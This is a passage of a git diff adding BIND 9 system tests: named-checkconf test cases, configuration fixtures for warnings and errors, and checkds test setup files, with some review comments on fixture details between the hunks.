< checkconf.out$n > /dev/null || ret=1 +grep "zone check-mx/IN: loaded serial" < checkconf.out$n > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that check-dup-records fails as configured ($n)" +ret=0 +$CHECKCONF -z check-dup-records-fail.conf > checkconf.out$n 2>&1 && ret=1 +grep "has semantically identical records" < checkconf.out$n > /dev/null || ret=1 +grep "zone check-dup-records/IN: loaded serial" < checkconf.out$n > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that check-mx fails as configured ($n)" +ret=0 +$CHECKCONF -z check-mx-fail.conf > checkconf.out$n 2>&1 && ret=1 +grep "failed: MX is an address" < checkconf.out$n > /dev/null || ret=1 +grep "zone check-mx/IN: loaded serial" < 
checkconf.out$n > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that check-mx-cname fails as configured ($n)" +ret=0 +$CHECKCONF -z check-mx-cname-fail.conf > checkconf.out$n 2>&1 && ret=1 +grep "MX.* is a CNAME (illegal)" < checkconf.out$n > /dev/null || ret=1 +grep "zone check-mx-cname/IN: loaded serial" < checkconf.out$n > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that check-srv-cname fails as configured ($n)" +ret=0 +$CHECKCONF -z check-srv-cname-fail.conf > checkconf.out$n 2>&1 && ret=1 +grep "SRV.* is a CNAME (illegal)" < checkconf.out$n > /dev/null || ret=1 +grep "zone check-mx-cname/IN: loaded serial" < checkconf.out$n > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that named-checkconf -p properly print a port range ($n)" +ret=0 +$CHECKCONF -p portrange-good.conf > checkconf.out$n 2>&1 || ret=1 +grep "range 8610 8614;" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that named-checkconf -z handles in-view ($n)" +ret=0 +$CHECKCONF -z in-view-good.conf > checkconf.out$n 2>&1 || ret=1 +grep "zone shared.example/IN: loaded serial" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that named-checkconf -z returns error when a later view is okay ($n)" +ret=0 +$CHECKCONF -z check-missing-zone.conf > checkconf.out$n 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that named-checkconf prints max-cache-size <percentage> correctly ($n)" +ret=0 +$CHECKCONF -p max-cache-size-good.conf > checkconf.out$n 2>&1 || ret=1 
+grep "max-cache-size 60%;" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that named-checkconf -l prints out the zone list ($n)" +ret=0 +$CHECKCONF -l good.conf | +grep -v "is deprecated" | +grep -v "is not implemented" | +grep -v "is not recommended" | +grep -v "no longer exists" | +grep -v "is obsolete" > checkconf.out$n || ret=1 +diff good.zonelist checkconf.out$n > diff.out$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that 'dnssec-lookaside auto;' generates a warning ($n)" +ret=0 +$CHECKCONF warn-dlv-auto.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "option 'dnssec-lookaside' is obsolete and should be removed" < checkconf.out$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that 'dnssec-lookaside . trust-anchor dlv.isc.org;' generates a warning ($n)" +ret=0 +$CHECKCONF warn-dlv-dlv.isc.org.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "option 'dnssec-lookaside' is obsolete and should be removed" < checkconf.out$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that 'dnssec-lookaside . 
trust-anchor dlv.example.com;' generates a warning ($n)"
+ret=0
+$CHECKCONF warn-dlv-dlv.example.com.conf > checkconf.out$n 2>/dev/null || ret=1
+grep "option 'dnssec-lookaside' is obsolete and should be removed" < checkconf.out$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that the 2010 ICANN ROOT KSK without the 2017 ICANN ROOT KSK generates a warning ($n)"
+ret=0
+$CHECKCONF check-root-ksk-2010.conf > checkconf.out$n 2>/dev/null || ret=1
+[ -s checkconf.out$n ] || ret=1
+grep "key without the updated" < checkconf.out$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that the 2010 ICANN ROOT KSK with the 2017 ICANN ROOT KSK does not generate a warning ($n)"
+ret=0
+$CHECKCONF check-root-ksk-both.conf > checkconf.out$n 2>/dev/null || ret=1
+[ -s checkconf.out$n ] && ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that the 2017 ICANN ROOT KSK alone does not generate a warning ($n)"
+ret=0
+$CHECKCONF check-root-ksk-2017.conf > checkconf.out$n 2>/dev/null || ret=1
+[ -s checkconf.out$n ] && ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that a static root key generates a warning ($n)"
+ret=0
+$CHECKCONF check-root-static-key.conf > checkconf.out$n 2>/dev/null || ret=1
+grep "static entry for the root zone WILL FAIL" checkconf.out$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that a static root DS trust anchor generates a warning ($n)"
+ret=0
+$CHECKCONF check-root-static-ds.conf > checkconf.out$n 2>/dev/null || ret=1
+grep "static entry for the root zone WILL FAIL" checkconf.out$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that a trusted-keys entry for root generates a warning ($n)"
+ret=0
+$CHECKCONF check-root-trusted-key.conf > checkconf.out$n 2>/dev/null || ret=1
+grep "trusted-keys entry for the root zone WILL FAIL" checkconf.out$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that using trust-anchors and managed-keys generates an error ($n)"
+ret=0
+$CHECKCONF check-mixed-keys.conf > checkconf.out$n 2>/dev/null && ret=1
+grep "use of managed-keys is not allowed" checkconf.out$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that 'geoip-use-ecs no' generates a warning ($n)"
+ret=0
+$CHECKCONF warn-geoip-use-ecs.conf > checkconf.out$n 2>/dev/null || ret=1
+[ -s checkconf.out$n ] || ret=1
+grep "'geoip-use-ecs' is obsolete" < checkconf.out$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking named-checkconf kasp errors ($n)"
+ret=0
+$CHECKCONF kasp-and-other-dnssec-options.conf > checkconf.out$n 2>&1 && ret=1
+grep "'inline-signing yes;' must also be configured explicitly for zones using dnssec-policy without a configured 'allow-update' or 'update-policy'" < checkconf.out$n > /dev/null || ret=1
+grep "'auto-dnssec maintain;' cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1
+grep "dnskey-sig-validity: cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1
+grep "dnssec-dnskey-kskonly: cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1
+grep "dnssec-secure-to-insecure: cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1
+grep "dnssec-update-mode: cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1
+grep "sig-validity-interval: cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1
+grep "update-check-ksk: cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking named-checkconf kasp nsec3 iterations errors ($n)"
+ret=0
+$CHECKCONF kasp-bad-nsec3-iter.conf > checkconf.out$n 2>&1 && ret=1
+grep "dnssec-policy: nsec3 iterations value 151 out of range" < checkconf.out$n > /dev/null || ret=1
+lines=$(wc -l < "checkconf.out$n")
+if [ $lines -ne 3 ]; then ret=1; fi
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking named-checkconf kasp nsec3 algorithm errors ($n)"
+ret=0
+$CHECKCONF kasp-bad-nsec3-alg.conf > checkconf.out$n 2>&1 && ret=1
+grep "dnssec-policy: cannot use nsec3 with algorithm 'RSASHA1'" < checkconf.out$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking named-checkconf kasp key errors ($n)"
+ret=0
+$CHECKCONF kasp-bad-keylen.conf > checkconf.out$n 2>&1 && ret=1
+grep "dnssec-policy: key with algorithm rsasha1 has invalid key length 511" < checkconf.out$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking named-checkconf kasp predefined key length ($n)"
+ret=0
+$CHECKCONF kasp-ignore-keylen.conf > checkconf.out$n 2>&1 || ret=1
+grep "dnssec-policy: key algorithm ecdsa256 has predefined length; ignoring length value 2048" < checkconf.out$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that a good 'kasp' configuration is accepted ($n)"
+ret=0
+$CHECKCONF good-kasp.conf > checkconf.out$n 2>/dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that named-checkconf prints a known good kasp config ($n)"
+ret=0
+awk 'BEGIN { ok = 0; } /cut here/ { ok = 1; getline } ok == 1 { print }' good-kasp.conf > good-kasp.conf.in
+[ -s good-kasp.conf.in ] || ret=1
+$CHECKCONF -p good-kasp.conf.in | grep -v '^good-kasp.conf.in:' > good-kasp.conf.out 2>&1 || ret=1
+cmp good-kasp.conf.in good-kasp.conf.out || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that max-ixfr-ratio 100% generates a warning ($n)"
+ret=0
+$CHECKCONF warn-maxratio1.conf > checkconf.out$n 2>/dev/null || ret=1
+grep "exceeds 100%" < checkconf.out$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that *-source options with specified port generate warnings ($n)"
+ret=0
+$CHECKCONF warn-transfer-source.conf > checkconf.out$n 2>/dev/null || ret=1
+grep "not recommended" < checkconf.out$n > /dev/null || ret=1
+$CHECKCONF warn-notify-source.conf > checkconf.out$n 2>/dev/null || ret=1
+grep "not recommended" < checkconf.out$n > /dev/null || ret=1
+$CHECKCONF warn-parental-source.conf > checkconf.out$n 2>/dev/null || ret=1
+grep "not recommended" < checkconf.out$n > /dev/null || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that using both max-zone-ttl and dnssec-policy generates a warning ($n)"
+ret=0
+$CHECKCONF warn-kasp-max-zone-ttl.conf > checkconf.out$n 2>/dev/null || ret=1
+grep "option 'max-zone-ttl' is ignored when used together with 'dnssec-policy'" < checkconf.out$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+n=$((n+1))
+echo_i "check that masterfile-format map generates deprecation warning ($n)"
+ret=0
+$CHECKCONF deprecated-masterfile-format-map.conf > checkconf.out$n 2>/dev/null || ret=1
+grep "is deprecated" < checkconf.out$n >/dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check that masterfile-format text and raw don't generate deprecation warning ($n)"
+ret=0
+$CHECKCONF good-masterfile-format-text.conf > checkconf.out$n 2>/dev/null || ret=1
+grep "is deprecated" < checkconf.out$n >/dev/null && ret=1
+$CHECKCONF good-masterfile-format-raw.conf > checkconf.out$n 2>/dev/null || ret=1
+grep "is deprecated" < checkconf.out$n >/dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check that 'check-wildcard no;' succeeds as configured ($n)"
+ret=0
+$CHECKCONF -z check-wildcard-no.conf > checkconf.out$n 2>&1 || ret=1
+grep -F "warning: ownername 'foo.*.check-wildcard' contains an non-terminal wildcard" checkconf.out$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that 'check-wildcard yes;' warns as configured ($n)"
+ret=0
+$CHECKCONF -z check-wildcard.conf > checkconf.out$n 2>&1 || ret=1
+grep -F "warning: ownername 'foo.*.check-wildcard' contains an non-terminal wildcard" checkconf.out$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi
+status=`expr $status + $ret`
+
+rmdir keys
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/checkconf/view-class-any1.conf b/bin/tests/system/checkconf/view-class-any1.conf
new file mode 100644
index 0000000..8b39456
--- /dev/null
+++ b/bin/tests/system/checkconf/view-class-any1.conf
@@ -0,0 +1,14 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view "example" any { };
diff --git a/bin/tests/system/checkconf/view-class-any2.conf b/bin/tests/system/checkconf/view-class-any2.conf
new file mode 100644
index 0000000..049ccf6
--- /dev/null
+++ b/bin/tests/system/checkconf/view-class-any2.conf
@@ -0,0 +1,14 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view "example" class255 { };
diff --git a/bin/tests/system/checkconf/view-class-in1.conf b/bin/tests/system/checkconf/view-class-in1.conf
new file mode 100644
index 0000000..1d203e6
--- /dev/null
+++ b/bin/tests/system/checkconf/view-class-in1.conf
@@ -0,0 +1,14 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view "example" in { };
diff --git a/bin/tests/system/checkconf/view-class-in2.conf b/bin/tests/system/checkconf/view-class-in2.conf
new file mode 100644
index 0000000..38b356e
--- /dev/null
+++ b/bin/tests/system/checkconf/view-class-in2.conf
@@ -0,0 +1,14 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view "example" class1 { };
diff --git a/bin/tests/system/checkconf/warn-dlv-auto.conf b/bin/tests/system/checkconf/warn-dlv-auto.conf
new file mode 100644
index 0000000..598edd2
--- /dev/null
+++ b/bin/tests/system/checkconf/warn-dlv-auto.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnssec-lookaside auto;
+};
diff --git a/bin/tests/system/checkconf/warn-dlv-dlv.example.com.conf b/bin/tests/system/checkconf/warn-dlv-dlv.example.com.conf
new file mode 100644
index 0000000..d274731
--- /dev/null
+++ b/bin/tests/system/checkconf/warn-dlv-dlv.example.com.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, You can obtain one at http://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnssec-lookaside . trust-anchor dlv.example.com;
+};
diff --git a/bin/tests/system/checkconf/warn-dlv-dlv.isc.org.conf b/bin/tests/system/checkconf/warn-dlv-dlv.isc.org.conf
new file mode 100644
index 0000000..47bea02
--- /dev/null
+++ b/bin/tests/system/checkconf/warn-dlv-dlv.isc.org.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, You can obtain one at http://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnssec-lookaside . trust-anchor dlv.isc.org;
+};
diff --git a/bin/tests/system/checkconf/warn-geoip-use-ecs.conf b/bin/tests/system/checkconf/warn-geoip-use-ecs.conf
new file mode 100644
index 0000000..9b95003
--- /dev/null
+++ b/bin/tests/system/checkconf/warn-geoip-use-ecs.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, You can obtain one at http://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ geoip-use-ecs no;
+};
diff --git a/bin/tests/system/checkconf/warn-kasp-max-zone-ttl.conf b/bin/tests/system/checkconf/warn-kasp-max-zone-ttl.conf
new file mode 100644
index 0000000..0d3139d
--- /dev/null
+++ b/bin/tests/system/checkconf/warn-kasp-max-zone-ttl.conf
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * The dnssec-policy is not defined. Should also be caught if it is inherited.
+ */
+
+options {
+ dnssec-policy default;
+};
+
+zone "example.net" {
+ type primary;
+ file "example.db";
+ inline-signing yes;
+ max-zone-ttl 600;
+};
diff --git a/bin/tests/system/checkconf/warn-keydir.conf b/bin/tests/system/checkconf/warn-keydir.conf
new file mode 100644
index 0000000..7aa4536
--- /dev/null
+++ b/bin/tests/system/checkconf/warn-keydir.conf
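Review bot: In warn-kasp-max-zone-ttl.conf the block comment says `The dnssec-policy is not defined`, but the fixture sets `dnssec-policy default;` in `options`, so the zone does have a policy, inherited rather than set on the zone itself. The comment contradicts what the file exercises and will mislead whoever next edits the fixture. I would reword it to `* dnssec-policy is inherited from options; max-zone-ttl on the zone must still trigger the warning.`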
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * key-directory defined but doesn't exist.
+ */
+options {
+ directory ".";
+};
+
+zone dummy {
+ type master;
+ file "xxxx";
+ key-directory "test.keydir";
+};
diff --git a/bin/tests/system/checkconf/warn-maxratio1.conf b/bin/tests/system/checkconf/warn-maxratio1.conf
new file mode 100644
index 0000000..31af34b
--- /dev/null
+++ b/bin/tests/system/checkconf/warn-maxratio1.conf
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone example {
+ type master;
+ masterfile-format map;
+ file "example.db";
+ max-ixfr-ratio 101%;
+};
diff --git a/bin/tests/system/checkconf/warn-notify-source.conf b/bin/tests/system/checkconf/warn-notify-source.conf
new file mode 100644
index 0000000..4d840cc
--- /dev/null
+++ b/bin/tests/system/checkconf/warn-notify-source.conf
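Review bot: warn-maxratio1.conf sets `masterfile-format map;` next to `max-ixfr-ratio 101%;`, so one fixture triggers two unrelated diagnostics; tests.sh in this same commit has a separate case that expects `is deprecated` for masterfile-format map. The ratio case greps only for `exceeds 100%`, so it passes today, but the fixture would start failing for the wrong reason if the map format were ever rejected outright rather than warned about. Dropping the `masterfile-format map;` line keeps the fixture down to the one option it is meant to test.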
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ notify-source 10.53.0.1 port 100;
+};
diff --git a/bin/tests/system/checkconf/warn-parental-source.conf b/bin/tests/system/checkconf/warn-parental-source.conf
new file mode 100644
index 0000000..2bbb34b
--- /dev/null
+++ b/bin/tests/system/checkconf/warn-parental-source.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ parental-source 10.53.0.1 port 100;
+};
diff --git a/bin/tests/system/checkconf/warn-transfer-source.conf b/bin/tests/system/checkconf/warn-transfer-source.conf
new file mode 100644
index 0000000..eb31041
--- /dev/null
+++ b/bin/tests/system/checkconf/warn-transfer-source.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ transfer-source 10.53.0.1 port 100;
+};
diff --git a/bin/tests/system/checkds/README b/bin/tests/system/checkds/README
new file mode 100644
index 0000000..759c4bd
--- /dev/null
+++ b/bin/tests/system/checkds/README
@@ -0,0 +1,26 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+SPDX-License-Identifier: MPL-2.0
+
+This Source Code Form is subject to the terms of the Mozilla Public
+License, v. 2.0. If a copy of the MPL was not distributed with this
+file, you can obtain one at https://mozilla.org/MPL/2.0/.
+
+See the COPYRIGHT file distributed with this work for additional
+information regarding copyright ownership.
+
+The test setup for the checkds tests.
+
+These servers are parent servers:
+- ns2 is a primary authoritative server that serves the parent zone for zones
+ configured in ns9.
+- ns4 is the secondary server for ns2.
+- ns5 is a primary authoritative server that serves the parent zone for zones
+ configured in ns9, but this one does not publish DS records (to test cases
+ where the DS is missing).
+- ns6 is an authoritative server for a different zone, to test badly configured
+ parental agents.
+- ns7 is the secondary server for ns5.
+
+Finally, ns9 is the authoritative server for the various DNSSEC enabled test
+domains.
diff --git a/bin/tests/system/checkds/clean.sh b/bin/tests/system/checkds/clean.sh
new file mode 100644
index 0000000..74bf421
--- /dev/null
+++ b/bin/tests/system/checkds/clean.sh
@@ -0,0 +1,26 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+set -e
+
+rm -f dig.out*
+rm -f ns*/named.conf ns*/named.memstats ns*/named.run*
+rm -f ns*/*.jnl ns*/*.jbk
+rm -f ns*/K*.private ns*/K*.key ns*/K*.state
+rm -f ns*/dsset-*
+rm -f ns*/*.db ns*/*.jnl ns*/*.jbk ns*/*.db.signed ns*/*.db.infile
+rm -f ns*/keygen.out.* ns*/settime.out.* ns*/signer.out.*
+rm -f ns*/managed-keys.bind*
+rm -f ns*/*.mkeys
+rm -f ns*/zones
+rm -f *.checkds.out
diff --git a/bin/tests/system/checkds/ns2/named.conf.in b/bin/tests/system/checkds/ns2/named.conf.in
new file mode 100644
index 0000000..44a5776
--- /dev/null
+++ b/bin/tests/system/checkds/ns2/named.conf.in
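Review bot: clean.sh removes `ns*/*.jnl ns*/*.jbk` twice, once on a line of its own and again inside the `rm -f ns*/*.db ...` line. With `rm -f` the repeat is harmless, but it makes the list harder to audit against what the setup scripts actually create. I would shorten the later line to `rm -f ns*/*.db ns*/*.db.signed ns*/*.db.infile`.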
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ allow-transfer { any; };
+ recursion no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "checkds" {
+ type primary;
+ file "checkds.db";
+};
diff --git a/bin/tests/system/checkds/ns2/setup.sh b/bin/tests/system/checkds/ns2/setup.sh
new file mode 100644
index 0000000..57c7f0a
--- /dev/null
+++ b/bin/tests/system/checkds/ns2/setup.sh
